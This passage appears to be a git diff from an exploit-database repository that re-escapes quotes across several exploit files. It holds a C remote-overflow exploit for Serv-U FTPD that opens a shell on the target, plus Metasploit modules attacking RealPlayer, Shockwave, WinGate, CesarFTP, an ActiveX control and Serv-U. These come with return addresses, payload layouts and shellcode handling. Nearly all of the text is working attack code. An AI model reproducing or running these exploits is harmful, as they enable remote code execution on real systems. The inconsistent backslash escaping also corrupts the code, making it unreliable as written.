+       snprintf (buff, sizeof (buff), \"PASS %s\\r\\n\", pass);
        ret = new_send (sock, buff, strlen (buff));
-       fprintf (stderr, "[*] %d bytes send. \n", ret);
+       fprintf (stderr, \"[*] %d bytes send. \\n\", ret);
 
        sleep (1);
 
        clearbit (buff);
        new_recv (sock, buff, sizeof (buff) - 1);
-       if (!strstr (buff, "230")) {
-               fprintf (stderr, "[-] pass failed. \n%s\n", buff);
+       if (!strstr (buff, \"230\")) {
+               fprintf (stderr, \"[-] pass failed. \\n%s\\n\", buff);
                return -1;
        }
 
-       fprintf (stderr, "[+] login success .\n");
+       fprintf (stderr, \"[+] login success .\\n\");
 
        return sock;
 
@@ -446,7 +446,7 @@ void do_overflow (int sock)
        clearbit (chmodBuffer);
        
        for(i = 0; i < 47; i++) 
-        strcat(chmodBuffer, "a");
+        strcat(chmodBuffer, \"a\");
 for(i = 0; i < 16; i += 8) {
         *(unsigned int*)&chmodBuffer[47+i] = 0x06eb9090;
         *(unsigned int*)&chmodBuffer[51+i] = architectures[x].magic; //0x1002bd78;  //pop reg pop reg ret
@@ -459,20 +459,20 @@ memcpy (&shellcode[120 + 4], &newport, 2);
  strcat(chmodBuffer, decoder);
  
 
-       fprintf (stderr, "[+] remote version: %s\n", architectures[x].desc);
+       fprintf (stderr, \"[+] remote version: %s\\n\", architectures[x].desc);
 
-       fprintf (stderr, "[+] trigger vulnerability !\n ");
-       strcpy (Comand, "MDTM 20031111111111+");
+       fprintf (stderr, \"[+] trigger vulnerability !\\n \");
+       strcpy (Comand, \"MDTM 20031111111111+\");
        strncat (Comand, chmodBuffer, strlen (chmodBuffer) - 1);
-       strcat (Comand, " ");
+       strcat (Comand, \" \");
 
 
        strcat (Comand, shellcode);
       
-       strcat (Comand, "hacked_by.sst\r\n");
+       strcat (Comand, \"hacked_by.sst\\r\\n\");
 
        ret =  new_send (sock, Comand, strlen (Comand));
-       fprintf (stderr, "[+] %d bytes overflow strings sent!\n", ret);
+       fprintf (stderr, \"[+] %d bytes overflow strings sent!\\n\", ret);
 
 
        return;
@@ -485,63 +485,63 @@ void showHELP (char *p)
 {
        int     i;
 
-       fprintf (stderr, "Usage: %s [Options] \n", p);
-       fprintf (stderr, "Options:\n"
-               "\t-h [remote host]\tremote host\n"
-               "\t-P [server port]\tserver port\n"
-               "\t-t [system type]\tchoice the system type\n"
-               "\t-u [user   name]\tlogin with this username\n"
-               "\t-p [pass   word]\tlogin with this passwd\n"
-               "\t-d [shell  port]\trebind using this port (default: ftpd port)\n\n");
+       fprintf (stderr, \"Usage: %s [Options] \\n\", p);
+       fprintf (stderr, \"Options:\\n\"
+               \"\\t-h [remote host]\\tremote host\\n\"
+               \"\\t-P [server port]\\tserver port\\n\"
+               \"\\t-t [system type]\\tchoice the system type\\n\"
+               \"\\t-u [user   name]\\tlogin with this username\\n\"
+               \"\\t-p [pass   word]\\tlogin with this passwd\\n\"
+               \"\\t-d [shell  port]\\trebind using this port (default: ftpd port)\\n\\n\");
 
 
-       printf ("num . description\n");
-       printf ("----+-----------------------------------------------"
-               "--------\n");
+       printf (\"num . description\\n\");
+       printf (\"----+-----------------------------------------------\"
+               \"--------\\n\");
        for (i = 0; i <= MAX_NUM; i ++) {
-               printf ("%3d | %s\n", i, architectures[i].desc);
+               printf (\"%3d | %s\\n\", i, architectures[i].desc);
        }
-       printf ("    '\n");
+       printf (\"    \'\\n\");
        return;
 }
 
 int main (int c, char *v[])
 {
        int             ch, fd, sd;
-       char     *hostName = NULL, *userName = "ftp", *passWord = "sst@SERV-u";
+       char     *hostName = NULL, *userName = \"ftp\", *passWord = \"sst@SERV-u\";
        shellport  = port;
        
 
-       fprintf (stderr, "Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit "VER"\n"
-               "bug find by bkbll (bkbll@cnhonker.net) code by Sam (Sam@0x557.org)\n\n");
+       fprintf (stderr, \"Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit \"VER\"\\n\"
+               \"bug find by bkbll (bkbll@cnhonker.net) code by Sam (Sam@0x557.org)\\n\\n\");
 
        if (c < 2) {
                showHELP (v[0]);
                exit (1);
        }
 
-       while((ch = getopt(c, v, "h:t:u:p:P:c:d:")) != EOF) {
+       while((ch = getopt(c, v, \"h:t:u:p:P:c:d:\")) != EOF) {
                switch(ch) {
-                       case 'h':
+                       case \'h\':
                                hostName = optarg;
                                break;
-                       case 't':
+                       case \'t\':
                                x = atoi (optarg);
                                if (x > MAX_NUM) {
-                                       printf ("[-] wtf your input?\n");
+                                       printf (\"[-] wtf your input?\\n\");
                                        exit (-1);
                                }
                                break;
-                       case 'u':
+                       case \'u\':
                                userName = optarg;
                                break;
-                       case 'p':
+                       case \'p\':
                                passWord = optarg;
                                break;
-                       case 'P':
+                       case \'P\':
                         port = atoi (optarg);
                         break;
-                       case 'd':
+                       case \'d\':
                         shellport = atoi (optarg);
                         break;
                        default:
@@ -553,7 +553,7 @@ int main (int c, char *v[])
 
        fd = ftp_login (hostName, port, userName, passWord);
        if (fd <= 0) {
-               printf ("[-] can't connnect\n");
+               printf (\"[-] can\'t connnect\\n\");
                exit (-1);
        }
 
@@ -565,11 +565,11 @@ close (fd);
       
        sd = new_tcpConnect (hostName, shellport, 3000);
        if (sd <= 0) {
-               printf ("[-] failed\n");
+               printf (\"[-] failed\\n\");
                return -1;
        }
 
-       fprintf (stderr, "[+] successed!!\n\n\n");
+       fprintf (stderr, \"[+] successed!!\\n\\n\\n\");
        sh (0, 1, sd);
 
        close (sd);
diff --git a/platforms/windows/remote/15809.html b/platforms/windows/remote/15809.html
index ed6d325e4..13d0c7955 100755
--- a/platforms/windows/remote/15809.html
+++ b/platforms/windows/remote/15809.html
@@ -1,24 +1,24 @@
 Exploit-DB Notes:
-Original credit goes to "牛奶坦克" via WooYun:
+Original credit goes to \"牛奶坦克\" via WooYun:
 http://www.wooyun.org/bugs/wooyun-2010-01006
 
 
 
-
+
 
 
 
-
 		
 				|
 
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+		print_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")
 
 		send_response_html(cli, content)
 
diff --git a/platforms/windows/remote/16565.rb b/platforms/windows/remote/16565.rb
index 9cbf97f8c..ce43e61a7 100755
--- a/platforms/windows/remote/16565.rb
+++ b/platforms/windows/remote/16565.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -18,39 +18,39 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow\',
+			\'Description\'    => %q{
 				This module exploits a stack buffer overflow in RKD Software Barcode Application
-				ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint
+				ActiveX Control \'BarCodeAx.dll\'. By sending an overly long string to the BeginPrint
 				method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.
 			},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'Trancek ', 'patrick' ],
-			'Version'        => '$Revision: 9262 $',
-			'References'     =>
+			\'License\'        => MSF_LICENSE,
+			\'Author\'         => [ \'Trancek \', \'patrick\' ],
+			\'Version\'        => \'$Revision: 9262 $\',
+			\'References\'     =>
 				[
-					[ 'URL', 'http://www.milw0rm.com/exploits/4094' ],
-					[ 'OSVDB', '37482' ],
-					[ 'BID', '24596' ],
-					[ 'CVE', '2007-3435' ],
+					[ \'URL\', \'http://www.milw0rm.com/exploits/4094\' ],
+					[ \'OSVDB\', \'37482\' ],
+					[ \'BID\', \'24596\' ],
+					[ \'CVE\', \'2007-3435\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'process',
+					\'EXITFUNC\' => \'process\',
 				},
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'         => 1024,
-					'BadChars' => "\x00\x0a\x0d\x20\'\"%<>@=,.\#$&()\\/",
-					'StackAdjustment' => -3500,
+					\'Space\'         => 1024,
+					\'BadChars\' => \"\\x00\\x0a\\x0d\\x20\\\'\\\"%<>@=,.\\#$&()\\\\/\",
+					\'StackAdjustment\' => -3500,
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll patrickw xpsp0
+					[ \'Windows XP SP0 English\', { \'Ret\' => 0x71ab7bfb } ] # jmp esp ws2_32.dll patrickw xpsp0
 				],
-			'DisclosureDate' => 'Jun 22 2007',
-			'DefaultTarget'  => 0))
+			\'DisclosureDate\' => \'Jun 22 2007\',
+			\'DefaultTarget\'  => 0))
 	end
 
 	def autofilter
@@ -68,18 +68,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Randomize some things
 		vname = rand_text_alpha(rand(100) + 1)
 
-		buff = Rex::Text.rand_text_alphanumeric(656) + [target['Ret']].pack('V') + make_nops(20) + payload.encoded
+		buff = Rex::Text.rand_text_alphanumeric(656) + [target[\'Ret\']].pack(\'V\') + make_nops(20) + payload.encoded
 
 		# Build out the message
 		content = %Q|
-
-
 
 |
 
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+		print_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")
 
 		# Transmit the response to the client
 		send_response_html(cli, content)
diff --git a/platforms/windows/remote/16586.rb b/platforms/windows/remote/16586.rb
index 931bc231c..08389ade5 100755
--- a/platforms/windows/remote/16586.rb
+++ b/platforms/windows/remote/16586.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \\\'msf/core\\\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -18,45 +18,45 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'RealNetworks RealPlayer SMIL Buffer Overflow',
-			'Description'    => %q{
+			\\\'Name\\\'           => \\\'RealNetworks RealPlayer SMIL Buffer Overflow\\\',
+			\\\'Description\\\'    => %q{
 					This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.
 				By creating a URL link to a malicious SMIL file, a remote attacker could
 				overflow a buffer and execute arbitrary code.
-				When using this module, be sure to set the URIPATH with an extension of '.smil'.
+				When using this module, be sure to set the URIPATH with an extension of \\\'.smil\\\'.
 				This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8
 				build 6.0.9.584.
 			},
-			'License'        => MSF_LICENSE,
-			'Author'         => 'MC',
-			'Version'        => '$Revision: 9262 $',
-			'References'     =>
+			\\\'License\\\'        => MSF_LICENSE,
+			\\\'Author\\\'         => \\\'MC\\\',
+			\\\'Version\\\'        => \\\'$Revision: 9262 $\\\',
+			\\\'References\\\'     =>
 				[
-					[ 'CVE', '2005-0455' ],
-					[ 'OSVDB', '14305'],
-					[ 'BID', '12698' ],
+					[ \\\'CVE\\\', \\\'2005-0455\\\' ],
+					[ \\\'OSVDB\\\', \\\'14305\\\'],
+					[ \\\'BID\\\', \\\'12698\\\' ],
 				],
 
-			'DefaultOptions' =>
+			\\\'DefaultOptions\\\' =>
 				{
-					'EXITFUNC' => 'process',
+					\\\'EXITFUNC\\\' => \\\'process\\\',
 				},
 
-			'Payload'        =>
+			\\\'Payload\\\'        =>
 				{
-					'Space'    => 500,
-					'BadChars' => "\x00\x90\x0a\x0d\x20\x3c\x3e\x2f\x5c\x22\x58\x3d\x3b\x40\x3f\x27\x26\x25",
-					'StackAdjustment' => -3500,
+					\\\'Space\\\'    => 500,
+					\\\'BadChars\\\' => \\\"\\\\x00\\\\x90\\\\x0a\\\\x0d\\\\x20\\\\x3c\\\\x3e\\\\x2f\\\\x5c\\\\x22\\\\x58\\\\x3d\\\\x3b\\\\x40\\\\x3f\\\\x27\\\\x26\\\\x25\\\",
+					\\\'StackAdjustment\\\' => -3500,
 				},
-			'Platform' => 'win',
-			'Targets'        =>
+			\\\'Platform\\\' => \\\'win\\\',
+			\\\'Targets\\\'        =>
 				[
-					[ 'RealPlayer 10/8 on Windows 2000 SP0-SP4 English',     { 'Offset' => 608, 'Ret' => 0x75022ac4 } ],
-					[ 'RealPlayer 10/8 on Windows XP PRO SP0-SP1 English',   { 'Offset' => 584, 'Ret' => 0x71aa2461 } ],
+					[ \\\'RealPlayer 10/8 on Windows 2000 SP0-SP4 English\\\',     { \\\'Offset\\\' => 608, \\\'Ret\\\' => 0x75022ac4 } ],
+					[ \\\'RealPlayer 10/8 on Windows XP PRO SP0-SP1 English\\\',   { \\\'Offset\\\' => 584, \\\'Ret\\\' => 0x71aa2461 } ],
 				],
-			'Privileged'     => false,
-			'DisclosureDate' => 'Mar 1 2005',
-			'DefaultTarget'  => 0))
+			\\\'Privileged\\\'     => false,
+			\\\'DisclosureDate\\\' => \\\'Mar 1 2005\\\',
+			\\\'DefaultTarget\\\'  => 0))
 	end
 
 	def on_request_uri(cli, request)
@@ -66,18 +66,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		cruft  =  rand_text_alpha_upper(1)
 		bleh   =  rand_text_alpha_upper(11)
 
-		sploit =  rand_text_alpha_upper(target['Offset']) + payload.encoded
-		sploit << "\xeb\x06" + rand_text_alpha_upper(2) + [target.ret].pack('V')
-		sploit << [0xe8, -485].pack('CV')
+		sploit =  rand_text_alpha_upper(target[\\\'Offset\\\']) + payload.encoded
+		sploit << \\\"\\\\xeb\\\\x06\\\" + rand_text_alpha_upper(2) + [target.ret].pack(\\\'V\\\')
+		sploit << [0xe8, -485].pack(\\\'CV\\\')
 
 		# Build the HTML content
-		content =  ""
-		content << ""
+		content =  \\\"\\\"
+		content << \\\"\\\"
 
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+		print_status(\\\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\\\")
 
 		# Transmit the response to the client
-		send_response_html(cli, content, { 'Content-Type' => 'text/html' })
+		send_response_html(cli, content, { \\\'Content-Type\\\' => \\\'text/html\\\' })
 
 		# Handle the payload
 		handler(cli)
diff --git a/platforms/windows/remote/16594.rb b/platforms/windows/remote/16594.rb
index dd383a7ec..128d4e7a2 100755
--- a/platforms/windows/remote/16594.rb
+++ b/platforms/windows/remote/16594.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -18,37 +18,37 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Adobe Shockwave rcsL Memory Corruption',
-			'Description'    => %q{
-					This module exploits a weakness in the Adobe Shockwave player's handling of
+			\'Name\'           => \'Adobe Shockwave rcsL Memory Corruption\',
+			\'Description\'    => %q{
+					This module exploits a weakness in the Adobe Shockwave player\'s handling of
 				Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented
 				rcsL chunk. This vulnerability was discovered by http://www.abysssec.com.
 			},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'David Kennedy "ReL1K" '],
-			'Version'        => '$Revision: 10784 $',
-			'References'     =>
+			\'License\'        => MSF_LICENSE,
+			\'Author\'         => [ \'David Kennedy \"ReL1K\" \'],
+			\'Version\'        => \'$Revision: 10784 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2010-3653'],
-					[ 'OSVDB', '68803'],
-					[ 'URL', 'https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15296.zip' ],
+					[ \'CVE\', \'2010-3653\'],
+					[ \'OSVDB\', \'68803\'],
+					[ \'URL\', \'https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15296.zip\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'InitialAutoRunScript' => 'migrate -f'
+					\'InitialAutoRunScript\' => \'migrate -f\'
 				},
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00\x09\x0a\x0d",
+					\'Space\'         => 1024,
+					\'BadChars\'      => \"\\x00\\x09\\x0a\\x0d\",
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'Automatic',     { 'Ret' => 0x0a0a0a0a } ], # tested on XP SP2 and XP SP3
+					[ \'Automatic\',     { \'Ret\' => 0x0a0a0a0a } ], # tested on XP SP2 and XP SP3
 				],
-			'DisclosureDate' => 'Oct 21 2010',
-			'DefaultTarget'  => 0))
+			\'DisclosureDate\' => \'Oct 21 2010\',
+			\'DefaultTarget\'  => 0))
 	end
 
 	def autofilter
@@ -64,8 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def exploit
 
-		path = File.join( Msf::Config.install_root, "data", "exploits", "shockwave_rcsl.dir" )
-		fd = File.open( path, "rb" )
+		path = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"shockwave_rcsl.dir\" )
+		fd = File.open( path, \"rb\" )
 		@dir_data = fd.read(fd.stat.size)
 		fd.close
 
@@ -88,11 +88,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 msf
-
+
 
 
-
-
+
-
-
+
+
 
 
 
-
+
 
 
 
@@ -121,11 +121,11 @@ type="application/x-director" PlayerVersion=11 pluginspage="http://www.macromedi
 
 		# Transmit the response to the client
 		path = request.uri
-		if (path =~ /\.DIR/i)
-			print_status("Sending exploit DIR to #{cli.peerhost}:#{cli.peerport}...")
-			send_response(cli, @dir_data, { 'Content-Type' => 'application/octet-stream' })
+		if (path =~ /\\.DIR/i)
+			print_status(\"Sending exploit DIR to #{cli.peerhost}:#{cli.peerport}...\")
+			send_response(cli, @dir_data, { \'Content-Type\' => \'application/octet-stream\' })
 		else
-			print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...")
+			print_status(\"Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...\")
 			send_response_html(cli, content)
 		end
 
diff --git a/platforms/windows/remote/16690.rb b/platforms/windows/remote/16690.rb
index 536727272..4da75c1dc 100755
--- a/platforms/windows/remote/16690.rb
+++ b/platforms/windows/remote/16690.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -18,41 +18,41 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'Qbik WinGate WWW Proxy Server URL Processing Overflow\',
+			\'Description\'    => %q{
 					This module exploits a stack buffer overflow in Qbik WinGate version
 				6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the
 				HTTP proxy service on port 80, a remote attacker could overflow
 				a buffer and execute arbitrary code.
 			},
-			'Author'         => 'patrick',
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 10394 $',
-			'References'     =>
+			\'Author\'         => \'patrick\',
+			\'License\'        => MSF_LICENSE,
+			\'Version\'        => \'$Revision: 10394 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2006-2926' ],
-					[ 'OSVDB', '26214' ],
-					[ 'BID', '18312' ],
+					[ \'CVE\', \'2006-2926\' ],
+					[ \'OSVDB\', \'26214\' ],
+					[ \'BID\', \'18312\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'process',
+					\'EXITFUNC\' => \'process\',
 				},
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'    => 1000,
-					'BadChars' => "\x00\x0a\x0d\x20+&=%\/\\\#;\"\':<>?",
-					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
-					'StackAdjustment' => -3500,
+					\'Space\'    => 1000,
+					\'BadChars\' => \"\\x00\\x0a\\x0d\\x20+&=%\\/\\\\\\#;\\\"\\\':<>?\",
+					\'EncoderType\'   => Msf::Encoder::Type::AlphanumMixed,
+					\'StackAdjustment\' => -3500,
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'WinGate 6.1.1.1077', { 'Ret' => 0x01991932 } ], # call esi
+					[ \'WinGate 6.1.1.1077\', { \'Ret\' => 0x01991932 } ], # call esi
 				],
-			'Privileged'     => true,
-			'DisclosureDate' => 'Jun 07 2006',
-			'DefaultTarget' => 0))
+			\'Privileged\'     => true,
+			\'DisclosureDate\' => \'Jun 07 2006\',
+			\'DefaultTarget\' => 0))
 
 		register_options(
 			[
@@ -62,9 +62,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		connect
-		sock.put("GET /\r\n\r\n") # Malformed request to get proxy info
+		sock.put(\"GET /\\r\\n\\r\\n\") # Malformed request to get proxy info
 		banner = sock.get_once
-		if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/)
+		if (banner =~ /Server:\\sWinGate\\s6.1.1\\s\\(Build 1077\\)/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
@@ -73,14 +73,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect
 
-		print_status("Trying target #{target.name}...")
+		print_status(\"Trying target #{target.name}...\")
 
 		buff = Rex::Text.rand_text_alphanumeric(3000)
 		buff[1200, 1000] = payload.encoded # jmp here
 		buff[2200, 5] = Rex::Arch::X86.jmp(-1005) # esi
-		buff[2284, 4] = [target['Ret']].pack('V') #eip
+		buff[2284, 4] = [target[\'Ret\']].pack(\'V\') #eip
 
-		sploit  = "POST http://#{buff}/ HTTP/1.0\r\n\r\n"
+		sploit  = \"POST http://#{buff}/ HTTP/1.0\\r\\n\\r\\n\"
 
 		sock.put(sploit)
 		sock.get_once(-1, 3)
diff --git a/platforms/windows/remote/16713.rb b/platforms/windows/remote/16713.rb
index 64d0fae78..bed30d058 100755
--- a/platforms/windows/remote/16713.rb
+++ b/platforms/windows/remote/16713.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,57 +18,57 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Cesar FTP 0.99g MKD Command Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'Cesar FTP 0.99g MKD Command Buffer Overflow\',
+			\'Description\'    => %q{
 				This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.
 
 				You must have valid credentials to trigger this vulnerability. Also, you
 				only get one chance, so choose your target carefully.
 			},
-			'Author'         => 'MC',
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 11799 $',
-			'References'     =>
+			\'Author\'         => \'MC\',
+			\'License\'        => MSF_LICENSE,
+			\'Version\'        => \'$Revision: 11799 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2006-2961'],
-					[ 'OSVDB', '26364'],
-					[ 'BID', '18586'],
-					[ 'URL', 'http://secunia.com/advisories/20574/' ],
+					[ \'CVE\', \'2006-2961\'],
+					[ \'OSVDB\', \'26364\'],
+					[ \'BID\', \'18586\'],
+					[ \'URL\', \'http://secunia.com/advisories/20574/\' ],
 				],
-			'Privileged'     => true,
-			'DefaultOptions' =>
+			\'Privileged\'     => true,
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'process',
+					\'EXITFUNC\' => \'process\',
 				},
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'    => 250,
-					'BadChars' => "\x00\x20\x0a\x0d",
-					'StackAdjustment' => -3500,
-					'Compat'        =>
+					\'Space\'    => 250,
+					\'BadChars\' => \"\\x00\\x20\\x0a\\x0d\",
+					\'StackAdjustment\' => -3500,
+					\'Compat\'        =>
 						{
-							'SymbolLookup' => 'ws2ord',
+							\'SymbolLookup\' => \'ws2ord\',
 						}
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
-					[ 'Windows 2000 Pro SP4 French',  { 'Ret' => 0x775F29D0 } ],
-					[ 'Windows XP SP2/SP3 English',       { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
-					#[ 'Windows XP SP2 English',       { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
-					#[ 'Windows XP SP3 English',       { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll
-					[ 'Windows 2003 SP1 English',     { 'Ret' => 0x76AA679b } ],
+					[ \'Windows 2000 Pro SP4 English\', { \'Ret\' => 0x77e14c29 } ],
+					[ \'Windows 2000 Pro SP4 French\',  { \'Ret\' => 0x775F29D0 } ],
+					[ \'Windows XP SP2/SP3 English\',       { \'Ret\' => 0x774699bf } ], # jmp esp, user32.dll
+					#[ \'Windows XP SP2 English\',       { \'Ret\' => 0x76b43ae0 } ], # jmp esp, winmm.dll
+					#[ \'Windows XP SP3 English\',       { \'Ret\' => 0x76b43adc } ], # jmp esp, winmm.dll
+					[ \'Windows 2003 SP1 English\',     { \'Ret\' => 0x76AA679b } ],
 				],
-			'DisclosureDate' => 'Jun 12 2006',
-			'DefaultTarget'  => 0))
+			\'DisclosureDate\' => \'Jun 12 2006\',
+			\'DefaultTarget\'  => 0))
 	end
 
 	def check
 		connect
 		disconnect
 
-		if (banner =~ /CesarFTP 0\.99g/)
+		if (banner =~ /CesarFTP 0\\.99g/)
 			return Exploit::CheckCode::Vulnerable
 		end
 			return Exploit::CheckCode::Safe
@@ -77,12 +77,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect_login
 
-		sploit =  "\n" * 671 + rand_text_english(3, payload_badchars)
-		sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded
+		sploit =  \"\\n\" * 671 + rand_text_english(3, payload_badchars)
+		sploit << [target.ret].pack(\'V\') + make_nops(40) + payload.encoded
 
-		print_status("Trying target #{target.name}...")
+		print_status(\"Trying target #{target.name}...\")
 
-		send_cmd( ['MKD', sploit] , false)
+		send_cmd( [\'MKD\', sploit] , false)
 
 		handler
 		disconnect
diff --git a/platforms/windows/remote/16715.rb b/platforms/windows/remote/16715.rb
index 58f4c1c17..ddd7a9e94 100755
--- a/platforms/windows/remote/16715.rb
+++ b/platforms/windows/remote/16715.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Serv-U FTPD MDTM Overflow',
-			'Description'    => %q{
-					This is an exploit for the Serv-U\'s MDTM command timezone
+			\'Name\'           => \'Serv-U FTPD MDTM Overflow\',
+			\'Description\'    => %q{
+					This is an exploit for the Serv-U\\\'s MDTM command timezone
 				overflow. It has been heavily tested against versions
 				4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against
 				nt4/2k/xp/2k3. I have also had success against version 3,
@@ -32,62 +32,62 @@ class Metasploit3 < Msf::Exploit::Remote
 				This exploit is a single hit, the service dies after the
 				shellcode finishes execution.
 			},
-			'Author'         => [ 'spoonm' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 10394 $',
-			'References'     =>
+			\'Author\'         => [ \'spoonm\' ],
+			\'License\'        => MSF_LICENSE,
+			\'Version\'        => \'$Revision: 10394 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2004-0330'],
-					[ 'OSVDB', '4073'],
-					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html'],
-					[ 'URL', 'http://www.cnhonker.com/advisory/serv-u.mdtm.txt'],
-					[ 'URL', 'http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54'],
-					[ 'BID', '9751'],
+					[ \'CVE\', \'2004-0330\'],
+					[ \'OSVDB\', \'4073\'],
+					[ \'URL\', \'http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html\'],
+					[ \'URL\', \'http://www.cnhonker.com/advisory/serv-u.mdtm.txt\'],
+					[ \'URL\', \'http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54\'],
+					[ \'BID\', \'9751\'],
 				],
-			'Privileged'     => false,
-			'Payload'        =>
+			\'Privileged\'     => false,
+			\'Payload\'        =>
 				{
-					'Space'    => 1000,
-					'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
-					'StackAdjustment' => -3500,
+					\'Space\'    => 1000,
+					\'BadChars\' => \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\",
+					\'StackAdjustment\' => -3500,
 				},
-			'Targets'        =>
+			\'Targets\'        =>
 				[
 					[
-						'Serv-U Uber-Leet Universal ServUDaemon.exe', # Tested OK - hdm 11/25/2005
